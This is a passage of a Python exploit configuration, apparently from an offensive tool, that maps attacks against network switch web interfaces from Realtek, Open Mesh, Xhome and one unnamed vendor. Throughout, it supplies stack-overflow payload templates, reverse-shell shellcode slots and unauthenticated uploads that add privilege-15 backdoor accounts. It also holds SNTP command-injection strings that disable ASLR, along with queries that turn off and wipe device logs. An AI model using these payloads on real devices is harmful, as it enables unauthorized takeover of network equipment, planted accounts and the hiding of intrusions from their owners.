'query':'username=USERNAME&password=PASSWORD&login=1',
'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'vulnerable': False,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':False,
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'LOGGING_SERVICE=0&cmd=4353',
'status':'/cgi-bin/dispatcher.cgi?cmd=4352',
'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
'clean_logfile_query':'cmd_4364=Clear+file+messages',
'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
'clean_logmem_query':'cmd_4364=Clear+buffered+messages',
'vulnerable': True,
'safe': True
},
'verify': {
'dispatcher.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'response':'502',
'Content-Type':False,
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(112) + '&password='+ self.random_string(60) + '&STARTUP_BACKUP=1',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'json':False,
'authenticated': False,
'encryption':'clear',
'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
'del_query':'',
'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',
'vulnerable': False,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':False,
'authenticated': True,
'enable_uri':'/cgi-bin/dispatcher.cgi',
'enable_query':'sntp_enable=1&cmd=548',
'status_uri':'',
'inject_uri':'/cgi-bin/dispatcher.cgi',
'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
'delete_uri':'/cgi-bin/dispatcher.cgi',
'delete_query':'sntp_Server=+&sntp_Port=139&cmd=550',
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'sntp_enable=0&cmd=548',
'verify_uri':'/tmp/check',
'vulnerable': False,
'safe': True
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_add_account': {
'description':'Stack overflow in "username/password" (PoC: add priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_del_account': {
'description':'Stack overflow in "username/password" (PoC: del priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',
'log_settings_set_cmd':'&LOGGING_SERVICE=0',
'log_settings_set_SIGSEGV':False,
'log_ramClear_cmd':'&_del=0',
'log_ramClear_SIGSEGV':False,
'log_fileClear_cmd':'&_del=1',
'log_fileClear_SIGSEGV':False,
'workaround':False,
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',
'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',
'sys_timeSntp_set_check':'',
'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=139',
'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',
'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',
'sys_timeSettings_set_SIGSEGV': False,
'workaround':True,
'verify_uri':'/tmp/check',
'vulnerable': False,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&STARTUP_BACKUP=1',
'workaround':False,
'stack':True,
'vulnerable': True,
'safe': True
},
},
},
'Realtek': {
'vendor': 'Realtek',
'modulus_uri':'',
'info_leak':False,
'info_leak_JSON':False,
'info_leak_uri':'',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':False,
'encryption':'clear',
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'query':'username=USERNAME&password=PASSWORD&login=1',
'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':False,
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'LOGGING_SERVICE=0&cmd=5121',
'status':'',
'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
'clean_logfile_query':'cmd_5132=Clear+file+messages',
'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
'clean_logmem_query':'cmd_5132=Clear+buffered+messages',
'vulnerable': True,
'safe': True
},
'verify': {
'httpuploadbakcfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadbakcfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadruncfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httprestorecfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'',
'content':'dummy',
'content_check':'Image Signature Error',
'vulnerable': True,
'safe': True
},
'dispatcher.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'response':'502',
'Content-Type':False,
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username=admin&password='+ self.random_string(184) + '&login=1',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'json':False,
'authenticated': False,
'encryption':'md5',
'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
'del_query':'',
'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',
'vulnerable': True,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':False,
'authenticated': True,
'enable_uri':'/cgi-bin/dispatcher.cgi',
'enable_query':'sntp_enable=1&cmd=548',
'status_uri':'',
'inject_uri':'/cgi-bin/dispatcher.cgi',
'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
'delete_uri':'/cgi-bin/dispatcher.cgi',
'delete_query':'sntp_Server=+&sntp_Port=139&cmd=550',
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'sntp_enable=0&cmd=548',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'&login=1&_CMD_',
'sys_ping_post_check':'',
'sys_ping_post_SIGSEGV': False,
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
'log_settings_set_cmd':'&LOGGING_SERVICE=0',
'log_settings_set_SIGSEGV':False,
'log_ramClear_cmd':'',
'log_ramClear_SIGSEGV':False,
'log_fileClear_cmd':'',
'log_fileClear_SIGSEGV':False,
'workaround':True,
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=139',
'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=139',
'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',
'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',
'sys_timeSettings_set_SIGSEGV': False,
'workaround':False,
'verify_uri':'/tmp/check',
'vulnerable': False,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',
'workaround':True,
'stack':True,
'vulnerable': True,
'safe': True
},
},
},
'OpenMESH': {
'vendor': 'Open Mesh, Inc.',
'modulus_uri':'',
'info_leak':True,
'info_leak_JSON':False,
'info_leak_uri':'/loginMsg.js',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'',
'login_uri':'',
'query':'',
'status_uri':'',
'logout_uri':'',
'vulnerable': False,
'safe': True
},
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'',
'login_uri':'',
'query':'',
'status_uri':'',
'logout_uri':'',
'vulnerable': False,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'',
'disable_query':'',
'status':'',
'clean_logfile_uri':'',
'clean_logfile_query':'',
'clean_logmem_uri':'',
'clean_logmem_query':'',
'vulnerable': False,
'safe': True
},
'verify': {
'security.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/security.cgi?login',
'content':'usr=admin&pswrd=' + self.random_string(280),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'datajson.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr=admin&pswrd=' + self.random_string(288),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/sn_httpupload.cgi?',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'',
'content':'',
'add_uri':'',
'del_query':'',
'del_uri':'',
'vulnerable': False,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,
'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
'delete_query':'{"":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_add_account': {
'description':'Stack overflow in "username/password" (PoC: add priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_del_account': {
'description':'Stack overflow in "username/password" (PoC: del priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'verify_uri':'/conf_tmp/check',
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'log_settings_set_cmd':'&en=0',
'log_settings_set_SIGSEGV':True,
'log_ramClear_cmd':'&ta=0',
'log_ramClear_SIGSEGV':True,
'log_fileClear_cmd':'&ta=1',
'log_fileClear_SIGSEGV':True,
'workaround':False,
'verify_uri':'',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',
'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',
'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',
'sys_timeSettings_set_cmd_enable':'&sn=1',
'sys_timeSettings_set_cmd_disable':'&sn=0',
'sys_timeSettings_set_SIGSEGV': True,
'workaround':False,
'verify_uri':'/conf_tmp/check',
'vulnerable': True,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi-bin/security.cgi?login',
'logout_uri':'/cgi-bin/security.cgi?logout',
'query':'build=NOP&heap=NOP&to=NOP&higher=addresses&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
'stack':False,
'workaround':False,
'vulnerable': True,
'safe': True
},
},
},
'Xhome': {
'vendor': 'Xhome',
'modulus_uri':'',
'info_leak':False,
'info_leak_JSON':False,
'info_leak_uri':'',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':False,
'encryption':'clear',
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'query':'username=USERNAME&password=PASSWORD&login=1',
'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':False,
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'LOGGING_SERVICE=0&cmd=5121',
'status':'',
'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
'clean_logfile_query':'cmd_5132=Clear+file+messages',
'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
'clean_logmem_query':'cmd_5132=Clear+buffered+messages',
'vulnerable': True,
'safe': True
},
'verify': {
'httpuploadbakcfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadbakcfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadruncfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httprestorecfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'',
'content':'dummy',
'content_check':'Image Signature Error',
'vulnerable': True,
'safe': True
},
'dispatcher.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'response':'502',
'Content-Type':False,
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username=admin&password='+ self.random_string(184) + '&login=1',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'json':False,
'authenticated': False,
'encryption':'md5',
'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
'del_query':'',
'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',
'vulnerable': True,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':False,
'authenticated': True,
'enable_uri':'/cgi-bin/dispatcher.cgi',
'enable_query':'sntp_enable=1&cmd=548',
'status_uri':'',
'inject_uri':'/cgi-bin/dispatcher.cgi',
'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
'delete_uri':'/cgi-bin/dispatcher.cgi',
'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'sntp_enable=0&cmd=548',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},